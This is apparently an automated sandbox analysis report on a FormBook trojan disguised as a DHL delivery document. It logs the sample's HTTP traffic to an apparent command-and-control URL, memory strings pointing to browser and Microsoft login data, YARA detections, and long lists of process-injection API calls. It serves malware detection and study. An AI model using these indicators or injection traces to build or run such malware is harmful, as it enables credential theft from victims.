adL=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~b90
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:29:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyCJTmDV9ptbaS1LmXnX3s2wST%2FMbCNKmJzEUCj3PwPKcLPZaBEUBJQ7wSP9BeU1CH%2Bvb%2BvjgLgkMolS3mre3FWg86VlHduzeGggAamCEeRTfjFc1Uuq5uE8gviAp2%2BYQDLwXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88871cb238350c8a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 62 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b8L=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~90
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:29:35 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2WnHi2%2Fo01hPAdXMSd%2BMF9RsM2LjNCZc931bGtsT0%2BpaQ9liOpp4p1QAGFrE6%2BJ%2B%2F0GmQF0%2BrXcPteoLI74c2xDdEFGBLHQ21583ib450RLHFXQmKPbBNCNGS3sWZ2m9TndGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88871cc21cd58c45-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adL=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~b90
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:29:38 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goUQgH9ohKt1fmph30M6OlTfSSoEVX%2BnI%2BjIrBrD%2F3AN%2BT5WbfBSA7l9RjOMhkuzkRCPVlWXzuEnxV3Aurtf3H7jwG3Z4%2BH55oS6ywv69uZWnVIYB2k2LS0mkZzUWjnXkfzZKw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88871cd1ee21423f-EWRalt-svc: h3=":443"; ma=86400Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 65 79 6a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0eyj/ was not found on this server.</p></body></html>0
            Source: DHL_Delivery Documents.exe, 00000000.00000002.2080507854.0000000002E6E000.00000004.00000800.00020000.00000000.sdmp, YybGLWQSx.exe, 00000009.00000002.2305807020.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
            Source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.drString found in binary or memory: http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3282139682.0000000004CE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.alexbruma.com
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3282139682.0000000004CE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.alexbruma.com/0eyj/
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: setx.exe, 00000012.00000003.2891319373.00000000074A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large strings
            Source: DHL_Delivery Documents.exe, BufferingPage.csLong String: Length: 150953
            Source: YybGLWQSx.exe.0.dr, BufferingPage.csLong String: Length: 150953
            Source: 18.2.setx.exe.320cd08.2.raw.unpack, BufferingPage.csLong String: Length: 150953
            Source: 19.0.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.csLong String: Length: 150953
            Source: 19.2.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.csLong String: Length: 150953
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: DHL_Delivery Documents.exe
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_0042B543 NtClose,8_2_0042B543
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_0040A88F NtAllocateVirtualMemory,8_2_0040A88F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52B60 NtClose,LdrInitializeThunk,8_2_01C52B60
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01C52DF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01C52C70
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C535C0 NtCreateMutant,LdrInitializeThunk,8_2_01C535C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C54340 NtSetContextThread,8_2_01C54340
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C54650 NtSuspendThread,8_2_01C54650
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52BE0 NtQueryValueKey,8_2_01C52BE0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52BF0 NtAllocateVirtualMemory,8_2_01C52BF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52B80 NtQueryInformationFile,8_2_01C52B80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52BA0 NtEnumerateValueKey,8_2_01C52BA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52AD0 NtReadFile,8_2_01C52AD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52AF0 NtWriteFile,8_2_01C52AF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52AB0 NtWaitForSingleObject,8_2_01C52AB0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52DD0 NtDelayExecution,8_2_01C52DD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52DB0 NtEnumerateKey,8_2_01C52DB0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52D00 NtSetInformationFile,8_2_01C52D00
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52D10 NtMapViewOfSection,8_2_01C52D10
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52D30 NtUnmapViewOfSection,8_2_01C52D30
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52CC0 NtQueryVirtualMemory,8_2_01C52CC0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52CF0 NtOpenProcess,8_2_01C52CF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52CA0 NtQueryInformationToken,8_2_01C52CA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52C60 NtCreateKey,8_2_01C52C60
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52C00 NtQueryInformationProcess,8_2_01C52C00
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52FE0 NtCreateFile,8_2_01C52FE0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52F90 NtProtectVirtualMemory,8_2_01C52F90
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52FA0 NtQuerySection,8_2_01C52FA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52FB0 NtResumeThread,8_2_01C52FB0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52F60 NtCreateProcessEx,8_2_01C52F60
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52F30 NtCreateSection,8_2_01C52F30
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52EE0 NtQueueApcThread,8_2_01C52EE0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52E80 NtReadVirtualMemory,8_2_01C52E80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52EA0 NtAdjustPrivilegesToken,8_2_01C52EA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52E30 NtWriteVirtualMemory,8_2_01C52E30
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C53090 NtSetValueKey,8_2_01C53090
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C53010 NtOpenDirectoryObject,8_2_01C53010
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C539B0 NtGetContextThread,8_2_01C539B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C53D70 NtOpenThread,8_2_01C53D70
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C53D10 NtOpenProcessToken,8_2_01C53D10
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C54340 NtSetContextThread,LdrInitializeThunk,18_2_02C54340
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C54650 NtSuspendThread,LdrInitializeThunk,18_2_02C54650
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52AD0 NtReadFile,LdrInitializeThunk,18_2_02C52AD0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52AF0 NtWriteFile,LdrInitializeThunk,18_2_02C52AF0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52BE0 NtQueryValueKey,LdrInitializeThunk,18_2_02C52BE0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_02C52BF0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52BA0 NtEnumerateValueKey,LdrInitializeThunk,18_2_02C52BA0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52B60 NtClose,LdrInitializeThunk,18_2_02C52B60
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52EE0 NtQueueApcThread,LdrInitializeThunk,18_2_02C52EE0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52E80 NtReadVirtualMemory,LdrInitializeThunk,18_2_02C52E80
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52FE0 NtCreateFile,LdrInitializeThunk,18_2_02C52FE0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52FB0 NtResumeThread,LdrInitializeThunk,18_2_02C52FB0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52F30 NtCreateSection,LdrInitializeThunk,18_2_02C52F30
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52CA0 NtQueryInformationToken,LdrInitializeThunk,18_2_02C52CA0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52C60 NtCreateKey,LdrInitializeThunk,18_2_02C52C60
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52C70 NtFreeVirtualMemory,LdrInitializeThunk,18_2_02C52C70
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52DD0 NtDelayExecution,LdrInitializeThunk,18_2_02C52DD0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52DF0 NtQuerySystemInformation,LdrInitializeThunk,18_2_02C52DF0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52D10 NtMapViewOfSection,LdrInitializeThunk,18_2_02C52D10
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52D30 NtUnmapViewOfSection,LdrInitializeThunk,18_2_02C52D30
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C535C0 NtCreateMutant,LdrInitializeThunk,18_2_02C535C0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C539B0 NtGetContextThread,LdrInitializeThunk,18_2_02C539B0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52AB0 NtWaitForSingleObject,18_2_02C52AB0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52B80 NtQueryInformationFile,18_2_02C52B80
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52EA0 NtAdjustPrivilegesToken,18_2_02C52EA0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52E30 NtWriteVirtualMemory,18_2_02C52E30
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52F90 NtProtectVirtualMemory,18_2_02C52F90
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52FA0 NtQuerySection,18_2_02C52FA0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52F60 NtCreateProcessEx,18_2_02C52F60
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52CC0 NtQueryVirtualMemory,18_2_02C52CC0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52CF0 NtOpenProcess,18_2_02C52CF0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52C00 NtQueryInformationProcess,18_2_02C52C00
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52DB0 NtEnumerateKey,18_2_02C52DB0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C52D00 NtSetInformationFile,18_2_02C52D00
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C53090 NtSetValueKey,18_2_02C53090
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C53010 NtOpenDirectoryObject,18_2_02C53010
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C53D70 NtOpenThread,18_2_02C53D70
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C53D10 NtOpenProcessToken,18_2_02C53D10
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_00438020 NtDeleteFile,18_2_00438020
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_004380B0 NtClose,18_2_004380B0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_00438200 NtAllocateVirtualMemory,18_2_00438200
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_00437DE0 NtCreateFile,18_2_00437DE0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_00437F40 NtReadFile,18_2_00437F40
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 0_2_02C1D3840_2_02C1D384
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004100D38_2_004100D3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004010F08_2_004010F0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_0042D9738_2_0042D973
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004169F18_2_004169F1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004169F38_2_004169F3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004022608_2_00402260
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004012708_2_00401270
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004032008_2_00403200
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004102F38_2_004102F3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_0040E3738_2_0040E373
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_0040246D8_2_0040246D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004024708_2_00402470
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004244138_2_00424413
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_0040E54B8_2_0040E54B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004026A08_2_004026A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD81CC8_2_01CD81CC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE01AA8_2_01CE01AA
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD41A28_2_01CD41A2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA81588_2_01CA8158
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C101008_2_01C10100
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBA1188_2_01CBA118
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB20008_2_01CB2000
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE03E68_2_01CE03E6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2E3F08_2_01C2E3F0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDA3528_2_01CDA352
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA02C08_2_01CA02C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC02748_2_01CC0274
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE05918_2_01CE0591
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C205358_2_01C20535
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCE4F68_2_01CCE4F6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD24468_2_01CD2446
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC44208_2_01CC4420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1C7C08_2_01C1C7C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C447508_2_01C44750
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C207708_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3C6E08_2_01C3C6E0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A08_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CEA9A68_2_01CEA9A6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C369628_2_01C36962
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E8F08_2_01C4E8F0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C068B88_2_01C068B8
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C228408_2_01C22840
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2A8408_2_01C2A840
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD6BD78_2_01CD6BD7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDAB408_2_01CDAB40
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1EA808_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1ADE08_2_01C1ADE0
